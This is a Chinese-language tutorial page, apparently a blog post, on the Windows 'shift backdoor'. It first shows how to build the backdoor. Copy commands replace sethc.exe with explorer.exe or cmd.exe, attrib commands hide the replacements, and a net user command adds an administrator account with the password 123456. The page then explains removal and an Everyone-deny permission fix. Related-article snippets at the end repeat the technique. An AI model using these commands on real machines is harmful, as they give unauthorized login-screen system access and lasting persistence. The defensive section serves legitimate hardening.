一、什么是shift后门?

shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。

其操作就是在不知道管理员密码的情况下,连续按5次shift键来启动粘滞键,已进入服务器的系统程序管理器。

二、shift后门的制作?

其制作有很多种,下面介绍一种常用的,可以明白其原理自己扩展:

在cmd窗口,敲打命令如下:

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

用copy命令将explorer.exe复制为setch.exe,这样在登陆界面下连续按5次shift就可以调出程序管理系统了,就获取了系统权限。

(也可以将explorer.exe 改为cmd.exe,这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了,就获取了shell权限。)

使用命令:

net user admin 123456 /add && net localgroup administrators admin /add

执行上面的命令,便可以创建一个叫admin的用户,密码为123456.

三、shift后门的禁止?

两种方法:

第一种:直接删除C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择"显示所有文件和文件夹"把"隐藏受系统保护的操作系统文件"的选择取消才能看得到).这种方法不能完全解除,当服务器重启后,还是会出现后门。

第二种(建议使用这种方法):使用权限来约束这两个文件C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择"显示所有文件和文件夹"把"隐藏受系统保护的操作系统文件"的选择取消才能看得到). 在权限里设置为所有用户(Everyone)禁止运行。具体操作步骤如下:

1.找到C:\WINDOWS\system32目录下的sethc.exe文件,打开属性:

点击”高级“,去掉“允许父项的继承权限传播到该对象和所有子对象”的勾。

点击”添加“,在出现的选择用户和组中点击”立即查找“,在搜索结果中找到”Everoy“用户,并确定:

点击确定:

继续确定,将”Everoy“用户的权限设置为全部拒绝:

这样就禁止了安装和在此访问。当再次安装和访问时,就会出现拒绝访问:

shift后门制作和禁止相关推荐

  1. 后门之shift后门制作及修复方法

    一.如何制作shift后门 方法1 在cmd窗口,敲打命令如下: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\ ...

  2. 《老漏洞复现与分析篇》 - 其一 - shift后门

    引言 因为本菜鸡的博客没什么文章素材,所以想开一个新文章类别,本来想整一个漏洞分析和复现的,无奈由于实力不允许,只能再前面加一个"老"字,整一点多年前的老漏洞拿来复现和分析.俗话说 ...

  3. 沾滞键shift后门

    目录 1. 简介 2. 后门原理 3. 后门制作 3.1 方法一 cmd覆盖sethc 3.2 方法二 利用注册表修改沾滞键快捷方式 4. shift后门利用 1. 简介 沾滞键的目的是为了帮助那些按 ...

  4. linux php后门,Linux_一个初级的linux后门制作方法,众所周知,Linux的文件权限如: - phpStudy...

    一个初级的linux后门制作方法 众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件.所以我们只需要将bash复制出来 ...

  5. linux添加后门方法,超初级的linux后门制作方法

    超初级的linux后门制作方法 更新时间:2006年10月24日 00:00:00   作者: 众所周知,Linux的文件权限如: 777:666等,其实只要在相应的文件上加上UID的权限,就可以用到 ...

  6. SHIFT后门拿服务器之方法总结

    提权工具如下:cmd.exe Churrasco.exe nc.exe 提权前提:Wscript组件成功开启 如果Wscript组件被关闭,则使用以下方法开启: 源代码: <object run ...

  7. 后门制作及安装技术(全)

    后门制作及安装技术 摘要 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. (2002-09-16 13:30:19) 后门 声明:此文为翻译文章,QiangGe ...

  8. ④开启shift后门实验报告

    班级 计科1班 姓名 彭彭头 学号 时间 2022.05.13 成绩 实验项目名称 开启shift后门 实验目的 1.了解常用入侵主机的方法 2.掌握操作系统常见漏洞,并学会防范 实验内容 利用Win ...

  9. RDP shift后门漏洞

    RDP shift后门漏洞 在win7开机过程中,强制关闭计算机,再次开机会出现修复,点启动修复 当它无法修复时会弹出下面的框发送和不发送,这里有查看问题详细信息的按钮 点击该按钮可以看到有一些信息 ...

最新文章

  1. 适配器(GenericServlet)改造Servlet
  2. 滴滴AI负责人叶杰平:你的每一次出行,都已有AI落地的助力 | MEET 2020
  3. leetcode算法题--相交链表
  4. c++枚举类型(二) c++11 枚举类
  5. 消息队列入门案例-环境搭建
  6. SAP Spartacus State
  7. JDK 9:NotNullOrElse方法已添加到Objects类
  8. Linux下查看和停止所有java进程
  9. java replaceall删除中括号和内容_replaceAll()如何同时替换多个不同的字符串(或多个符号)...
  10. 解决nginx服务器显示txt文本为乱码的问题
  11. NTC热敏电阻温度计算方法,Steinhart-Hart方程和B值法
  12. 基于javaweb的教师信息管理系统
  13. 前端javascript解压zip文件[zip.js] 附上可用demo
  14. Redis(九)-Redis的常用数据类型之Hash表
  15. 云音乐计算机等科目英文,音乐英文术语
  16. 使用c++语言做概率论 涉及求方差
  17. linux命令英文单词
  18. 三极管类型及工作状态判断
  19. 学习spring英文官方文档方法
  20. Leetcode——153. Find Minimum in Rotated Sorted Array

热门文章

  1. 【cmd】快速打开文件夹
  2. 马上就是圣诞节了,但是,没想到程序猿的圣诞节竟然是这样的?
  3. [量化-031]金融哲学-道德经解读-002-道德经解读原则
  4. 使用 imgaug 对图像进行数据增强 Data Augmentation
  5. 【网络通信与信息安全】之深入解析TCP/IP协议的实现和原理
  6. FlyAI资讯:Uber正式开源分布式机器学习平台:Fiber
  7. 【电气专业知识问答】问:高压配电装置特殊天气下的检查项目有哪些?
  8. 成都学院计算机科学与技术怎么样,四川师范大学成都学院计算机科学与技术(本科)教育概况...
  9. Towards Transferable Targeted Attack 论文笔记
  10. checkstyle自定义设置